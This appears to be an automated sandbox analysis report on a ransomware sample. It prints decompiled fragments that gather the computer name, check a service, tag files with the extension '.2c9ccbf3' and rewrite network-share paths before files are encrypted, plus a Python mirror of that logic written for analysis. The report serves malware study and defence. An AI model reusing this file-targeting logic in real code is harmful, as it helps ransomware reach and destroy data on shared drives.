                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: FileFindNamePath_wcsicmpwcslenwcsrchr
                                                                                        • String ID:
                                                                                        • API String ID: 847853720-0
                                                                                        • Opcode ID: 8cee9548c1690b2960aba234fffd9ad61559d21186ed3d2da01992f487327397
                                                                                        • Instruction ID: c138e3890ee480235af9747d7f0291219ff55357d9efcbedceb71acd8f38e014
                                                                                        • Opcode Fuzzy Hash: 8cee9548c1690b2960aba234fffd9ad61559d21186ed3d2da01992f487327397
                                                                                        • Instruction Fuzzy Hash: EF018471508214FBE7209F18FD09B9B7BB8EF10311F504036E806B22A0E7765E69C7AE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00407F99() {
                                                                                        				long _v8;
                                                                                        				void* _v12;
                                                                                        
                                                                                        				_v12 = 0;
                                                                                        				_v8 = 0;
                                                                                        				GetComputerNameW(_v12,  &_v8);
                                                                                        				_v12 = RtlAllocateHeap( *0x40f5d6, 8, _v8 * 2);
                                                                                        				if(_v12 != 0 && GetComputerNameW(_v12,  &_v8) == 0) {
                                                                                        					RtlFreeHeap( *0x40f5d6, 0, _v12);
                                                                                        					_v12 = 0;
                                                                                        				}
                                                                                        				return _v12;
                                                                                        			}

                                                                                        Instruction addresses (address column detached from the C-code lines above): 0x00407fa4, 0x00407fab, 0x00407fb9, 0x00407fd8, 0x00407fdf, 0x00407ffd, 0x00408003, 0x00408003, 0x00408015

                                                                                        APIs
                                                                                        • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00407FB9
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00407FD2
                                                                                        • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00407FE8
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00407FFD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: ComputerHeapName$AllocateFree
                                                                                        • String ID:
                                                                                        • API String ID: 187446995-0
                                                                                        • Opcode ID: a2cb8c2ee7ec572bd830fdc07ab09d059a9f2807e480209936c9b8035d99568f
                                                                                        • Instruction ID: e2d9c646c272d9f1083c3d3729c0fb38b27cbebe2aef510062d823028366a619
                                                                                        • Opcode Fuzzy Hash: a2cb8c2ee7ec572bd830fdc07ab09d059a9f2807e480209936c9b8035d99568f
                                                                                        • Instruction Fuzzy Hash: 2D011A75900208FFEB20CF94ED49BEEBBB8FB44315F1040B9E400B22A0DB721A59DB54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00402627(short* _a4) {
                                                                                        				short* _v8;
                                                                                        				void* _v12;
                                                                                        				void* _v16;
                                                                                        
                                                                                        				_v8 = 0;
                                                                                        				_v16 = 0;
                                                                                        				_v12 = 0;
                                                                                        				_v12 = OpenSCManagerW(0, 0, 0xf003f);
                                                                                        				if(_v12 != 0) {
                                                                                        					_v16 = OpenServiceW(_v12, _a4, 0x80);
                                                                                        					if(_v16 != 0) {
                                                                                        						_v8 = 1;
                                                                                        						CloseServiceHandle(_v16);
                                                                                        					}
                                                                                        				}
                                                                                        				if(_v12 != 0) {
                                                                                        					CloseServiceHandle(_v12);
                                                                                        				}
                                                                                        				return _v8;
                                                                                        			}

                                                                                        Instruction addresses (address column detached from the C-code lines above): 0x00402632, 0x00402639, 0x00402640, 0x00402656, 0x0040265d, 0x00402670, 0x00402677, 0x00402679, 0x00402683, 0x00402683, 0x00402677, 0x0040268d, 0x00402692, 0x00402692, 0x004026a3

                                                                                        APIs
                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,00000000), ref: 00402650
                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000080,?,?,?,?,00000000), ref: 0040266A
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,00000000), ref: 00402683
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,00000000), ref: 00402692
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Service$CloseHandleOpen$Manager
                                                                                        • String ID:
                                                                                        • API String ID: 4196757001-0
                                                                                        • Opcode ID: 516d303d4581289e6c23c3fde63d268cadd7820ff18caff3f7c4205bb467e855
                                                                                        • Instruction ID: 0eb3d8930c036626841998c7be16530409ce4aa72f39d474933f9cb5dae4c122
                                                                                        • Opcode Fuzzy Hash: 516d303d4581289e6c23c3fde63d268cadd7820ff18caff3f7c4205bb467e855
                                                                                        • Instruction Fuzzy Hash: 17011A70900208FFEB218F95DD4DBADBBB4EB04315F2081B6E500722E0C7B60A88DB59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 58%
                                                                                        			E0040314C(intOrPtr _a4) {
                                                                                        				void* _t5;
                                                                                        
                                                                                        				_t5 = E00401D08(0x40cfeb);
                                                                                        				 *0x40f69c(_a4, _t5, ".2c9ccbf3");
                                                                                        				return RtlFreeHeap( *0x40f5d6, 0, _t5);
                                                                                        			}

                                                                                        Instruction addresses (address column detached from the C-code lines above): 0x0040315e, 0x00403169, 0x00403187

                                                                                        APIs
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                        • _swprintf.NTDLL ref: 00403169
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040317B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateFree_swprintf
                                                                                        • String ID: .2c9ccbf3
                                                                                        • API String ID: 3639372079-3269262987
                                                                                        • Opcode ID: 84f8500ff7b27c632c9b9271ce9a8f5ba679a93e4dab81cca705355d04b078e7
                                                                                        • Instruction ID: b976fa9e67b8a3228700ecdf3256604b03e66e09c4257d112e81dcf9821a38e6
                                                                                        • Opcode Fuzzy Hash: 84f8500ff7b27c632c9b9271ce9a8f5ba679a93e4dab81cca705355d04b078e7
                                                                                        • Instruction Fuzzy Hash: 18E01DB22452087FF2202B56FD4AE777F1CDB81765B104137F504B04B2D5721D19957D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 95%
                                                                                        			E00408C93() {
                                                                                        				signed int _t54;
                                                                                        				WCHAR* _t55;
                                                                                        				int _t56;
                                                                                        				WCHAR* _t64;
                                                                                        				WCHAR* _t65;
                                                                                        				WCHAR* _t66;
                                                                                        				WCHAR* _t68;
                                                                                        				WCHAR* _t76;
                                                                                        				WCHAR* _t77;
                                                                                        				WCHAR* _t78;
                                                                                        				intOrPtr* _t79;
                                                                                        				WCHAR* _t80;
                                                                                        				wchar_t* _t83;
                                                                                        				wchar_t* _t84;
                                                                                        				WCHAR* _t85;
                                                                                        				short* _t86;
                                                                                        				void* _t87;
                                                                                        				void* _t89;
                                                                                        
                                                                                        				while(1) {
                                                                                        					_t54 = GetFileAttributesW( *(_t87 - 8));
                                                                                        					if(_t54 == 0xffffffff) {
                                                                                        						break;
                                                                                        					}
                                                                                        					__eflags = _t54 & 0x00000010;
                                                                                        					if((_t54 & 0x00000010) != 0) {
                                                                                        						_t55 = PathIsNetworkPathW( *(_t87 - 8));
                                                                                        						__eflags = _t55;
                                                                                        						if(_t55 == 0) {
                                                                                        							L44:
                                                                                        							__eflags =  *0x40f5a2;
                                                                                        							if(__eflags != 0) {
                                                                                        								E004039E3(__eflags, ".2c9ccbf3");
                                                                                        							}
                                                                                        							_t56 = E00407D2C( *(_t87 - 4),  *(_t87 - 8));
                                                                                        							L47:
                                                                                        							return _t56;
                                                                                        						}
                                                                                        						__eflags =  *(_t87 - 8) - 0x5c005c;
                                                                                        						if( *(_t87 - 8) != 0x5c005c) {
                                                                                        							goto L44;
                                                                                        						}
                                                                                        						_t56 = RtlAllocateHeap( *0x40f5d6, 8, 0x1a + wcslen( *(_t87 - 8)) * 2);
                                                                                        						_t83 = _t56;
                                                                                        						__eflags = _t83;
                                                                                        						if(_t83 != 0) {
                                                                                        							 *_t83 = 0x5c005c;
                                                                                        							_t83[1] = 0x5c003f;
                                                                                        							_t83[2] = 0x4e0055;
                                                                                        							_t83[3] = 0x5c0043;
                                                                                        							wcscat(_t83,  &(( *(_t87 - 8))[2]));
                                                                                        							RtlFreeHeap( *0x40f5d6, 0,  *(_t87 - 8));
                                                                                        							 *(_t87 - 8) = _t83;
                                                                                        							__eflags =  *0x40f5e6;
                                                                                        							if( *0x40f5e6 == 0) {
                                                                                        								__eflags =  *0x40f5ea;
                                                                                        								if( *0x40f5ea != 0) {
                                                                                        									_t65 =  *0x40f5ea; // 0x0
                                                                                        									 *(_t87 - 4) = _t65;
                                                                                        								}
                                                                                        							} else {
                                                                                        								_t66 =  *0x40f5e6; // 0x0
                                                                                        								 *(_t87 - 4) = _t66;
                                                                                        							}
                                                                                        							while(1) {
                                                                                        								_t64 = E0040303D( *(_t87 - 4),  *(_t87 - 8));
                                                                                        								__eflags = _t64;
                                                                                        								if(_t64 != 0) {
                                                                                        									break;
                                                                                        								}
                                                                                        								_t56 = E004030A1( *(_t87 - 8));
                                                                                        								__eflags = _t56;
                                                                                        								if(_t56 == 0) {
                                                                                        									goto L47;
                                                                                        								}
                                                                                        							}
                                                                                        							_t50 = _t87 - 8;
                                                                                        							 *_t50 =  &(( *(_t87 - 8))[4]);
                                                                                        							__eflags =  *_t50;
                                                                                        							goto L44;
                                                                                        						}
                                                                                        						goto L47;
                                                                                        					}
                                                                                        					_t86 = PathFindExtensionW( *(_t87 - 8));
                                                                                        					__eflags =  *_t86;
                                                                                        					if( *_t86 == 0) {
                                                                                        						L14:
                                                                                        						_t68 = PathIsNetworkPathW( *(_t87 - 8));
                                                                                        						__eflags = _t68;
                                                                                        						if(_t68 == 0) {
                                                                                        							L27:
                                                                                        							__eflags =  *0x40f5a2;
                                                                                        							if(__eflags != 0) {
                                                                                        								E004039E3(__eflags, ".2c9ccbf3");
                                                                                        							}
                                                                                        							_t56 = E00407D2C( *(_t87 - 4),  *(_t87 - 8));
                                                                                        							goto L47;
                                                                                        						}
                                                                                        						_t56 = RtlAllocateHeap( *0x40f5d6, 8, 0x1a + wcslen( *(_t87 - 8)) * 2);
                                                                                        						_t84 = _t56;
                                                                                        						__eflags = _t84;
                                                                                        						if(_t84 != 0) {
                                                                                        							 *_t84 = 0x5c005c;
                                                                                        							_t84[1] = 0x5c003f;
                                                                                        							_t84[2] = 0x4e0055;
                                                                                        							_t84[3] = 0x5c0043;
                                                                                        							wcscat(_t84,  &(( *(_t87 - 8))[2]));
                                                                                        							RtlFreeHeap( *0x40f5d6, 0,  *(_t87 - 8));
                                                                                        							 *(_t87 - 8) = _t84;
                                                                                        							__eflags =  *0x40f5e6;
                                                                                        							if( *0x40f5e6 == 0) {
                                                                                        								__eflags =  *0x40f5ea;
                                                                                        								if( *0x40f5ea != 0) {
                                                                                        									_t77 =  *0x40f5ea; // 0x0
                                                                                        									 *(_t87 - 4) = _t77;
                                                                                        								}
                                                                                        							} else {
                                                                                        								_t78 =  *0x40f5e6; // 0x0
                                                                                        								 *(_t87 - 4) = _t78;
                                                                                        							}
                                                                                        							while(1) {
                                                                                        								_t76 = E0040303D( *(_t87 - 4),  *(_t87 - 8));
                                                                                        								__eflags = _t76;
                                                                                        								if(_t76 != 0) {
                                                                                        									break;
                                                                                        								}
                                                                                        								_t56 = E004030A1( *(_t87 - 8));
                                                                                        								__eflags = _t56;
                                                                                        								if(_t56 == 0) {
                                                                                        									goto L47;
                                                                                        								}
                                                                                        							}
                                                                                        							_t29 = _t87 - 8;
                                                                                        							 *_t29 =  &(( *(_t87 - 8))[4]);
                                                                                        							__eflags =  *_t29;
                                                                                        							goto L27;
                                                                                        						}
                                                                                        						goto L47;
                                                                                        					}
                                                                                        					_t79 = _t87 - 0x16;
                                                                                        					 *_t79 = 0x6c002e;
                                                                                        					 *((intOrPtr*)(_t79 + 4)) = 0x6b006e;
                                                                                        					 *((short*)(_t79 + 8)) = 0;
                                                                                        					_t80 =  *0x40f694(_t86, _t79);
                                                                                        					_t89 = _t89 + 8;
                                                                                        					__eflags = _t80;
                                                                                        					if(_t80 != 0) {
                                                                                        						goto L14;
                                                                                        					}
                                                                                        					_t56 = E00403BB0( *(_t87 - 8));
                                                                                        					_t85 = _t56;
                                                                                        					__eflags = _t85;
                                                                                        					if(__eflags != 0) {
                                                                                        						RtlFreeHeap( *0x40f5d6, 0,  *(_t87 - 8));
                                                                                        						 *(_t87 - 8) = _t85;
                                                                                        						continue;
                                                                                        					}
                                                                                        					goto L47;
                                                                                        				}
                                                                                        				_t56 = PathIsUNCServerW( *(_t87 - 8));
                                                                                        				if(_t56 != 0) {
                                                                                        					_t97 =  *0x40f5a2;
                                                                                        					if( *0x40f5a2 != 0) {
                                                                                        						E004039E3(_t97, ".2c9ccbf3");
                                                                                        					}
                                                                                        					_t56 = E00407B27( *(_t87 - 8));
                                                                                        				}
                                                                                        				goto L47;
                                                                                        			}
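The branch order in the listing above is worth pinning down, because it is where the sample decides how a target path is handled before anything is encrypted: `PathIsUNCServerW` separates a bare `\\server` from everything else, `PathFindExtensionW` feeds a case-insensitive compare against the two packed immediates `0x6c002e, 0x6b006e` (which spell `.lnk`), and `PathIsNetworkPathW` gates a rewrite of `\\server\share\...` into the extended-length form `\\?\UNC\server\share\...` built from the four immediates `0x5c005c, 0x5c003f, 0x4e0055, 0x5c0043`, after which `.2c9ccbf3` is passed to `E004039E3` and the path goes to `E00407D2C`. The Python below is an added example written for this report, not code from the sample or from Joe Sandbox: it decodes those DWORD immediates back into UTF-16 text and replays the decision order on plain strings so the logic can be checked offline. Assumptions: the `SHLWAPI` predicates are approximated (no mapped-drive lookup, which the real `PathIsNetworkPathW` does perform), the indirect call through `*0x40f694` is taken to be the `_wcsicmp` listed at `00408D31`, and the subroutines `E00407B27`, `E00403BB0` and `E00407D2C` are only referred to by the action that reaches them, since the report does not name them.

```python
"""Mirror of the path-handling branches in the routine decompiled above.

Added example for this analysis report; not code from the sample.  It decodes
the packed UTF-16LE immediates the decompiler prints as 32-bit constants and
re-implements the branch order on a plain string.  The SHLWAPI predicates are
approximations (assumption: no mapped-drive lookup).
"""
import struct
from typing import Iterable


def decode_wchar_immediates(words: Iterable[int], tail: bytes = b"") -> str:
    """Turn DWORD stores of UTF-16LE text back into a string.

    The listing shows e.g. ``*_t84 = 0x5c005c`` for two WCHARs written at
    once; each 32-bit value holds two little-endian UTF-16 code units.
    """
    raw = b"".join(struct.pack("<I", w) for w in words) + tail
    return raw.decode("utf-16-le").rstrip("\x00")


# Constants copied from the decompiled listing above.
EXTENDED_UNC_PREFIX = decode_wchar_immediates([0x5C005C, 0x5C003F, 0x4E0055, 0x5C0043])
LNK_EXTENSION = decode_wchar_immediates([0x6C002E, 0x6B006E], tail=struct.pack("<H", 0))
ENCRYPTED_EXTENSION = ".2c9ccbf3"  # literal passed to E004039E3 before E00407D2C


def path_is_unc_server(path: str) -> bool:
    """Approximation of PathIsUNCServerW: two backslashes, a server, no share."""
    if not path.startswith("\\\\") or path.startswith("\\\\?\\"):
        return False
    rest = path[2:]
    return bool(rest) and "\\" not in rest


def path_is_network_path(path: str) -> bool:
    """Approximation of PathIsNetworkPathW using only the leading-backslash
    rule (assumption: the real API also consults GetDriveType for mapped
    drive letters, which is not modelled here)."""
    return path.startswith("\\\\") and not path.startswith("\\\\?\\")


def path_find_extension(path: str) -> str:
    """PathFindExtensionW: extension of the last component, '' if none."""
    name = path.rsplit("\\", 1)[-1]
    dot = name.rfind(".")
    return "" if dot < 0 else name[dot:]


def to_extended_unc(path: str) -> str:
    """The RtlAllocateHeap .. wcscat block: drop the two leading backslashes
    and prepend the 8-WCHAR prefix.  The sample allocates 0x1a + 2*wcslen
    bytes, which holds prefix, remainder and terminating NUL with room spare.
    """
    return EXTENDED_UNC_PREFIX + path[2:]


def classify_target(path: str) -> tuple:
    """Replay the branch order of the listing; return (action, path_used).

    'server'  -> E00407B27   (PathIsUNCServerW true)
    'lnk'     -> E00403BB0   (extension equals .lnk; its result is looped back)
    'encrypt' -> E00407D2C   (network paths rewritten to \\\\?\\UNC\\ first)
    """
    if path_is_unc_server(path):
        return "server", path
    ext = path_find_extension(path)
    if ext and ext.lower() == LNK_EXTENSION:  # _wcsicmp: case-insensitive
        return "lnk", path
    if path_is_network_path(path):
        path = to_extended_unc(path)
    return "encrypt", path
```

Running `classify_target` over a share path, a bare server name and a `.LNK` on a local drive reproduces the three exits of the listing; the decoded constants confirm that the DWORD stores spell `\\?\UNC\` and `.lnk` rather than anything obfuscated.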

                                                                                        Instruction addresses of the decompiled statements above: 0x00408cc2 to 0x00408f58 (per-statement address column, not aligned here).

                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNEL32(00000000,00000000), ref: 00408CC5
                                                                                        • PathIsUNCServerW.SHLWAPI(00000000), ref: 00408CD3
                                                                                        • PathFindExtensionW.SHLWAPI(00000000), ref: 00408D0B
                                                                                        • _wcsicmp.NTDLL ref: 00408D31
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00408D5C
                                                                                        • PathIsNetworkPathW.SHLWAPI(00000000), ref: 00408D6D
                                                                                        • wcslen.NTDLL ref: 00408D7E
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00408D97
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Path$Heap$AllocateAttributesExtensionFileFindFreeNetworkServer_wcsicmpwcslen
                                                                                        • String ID: .2c9ccbf3
                                                                                        • API String ID: 618392986-3269262987
                                                                                        • Opcode ID: a012caf977fb2c86210e35754b7c8f841d14fda69e372c7a0dd1edca875ad39e
                                                                                        • Instruction ID: e1610dc7eb3bada1d9e06009aa20c081853d766bd444b5e13b74853a5dfabee6
                                                                                        • Opcode Fuzzy Hash: a012caf977fb2c86210e35754b7c8f841d14fda69e372c7a0dd1edca875ad39e
                                                                                        • Instruction Fuzzy Hash: BEE04F3050A109A6EB212B60AF06A6E7E319B00314F20427FE552B05E3CF3D495AB62E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%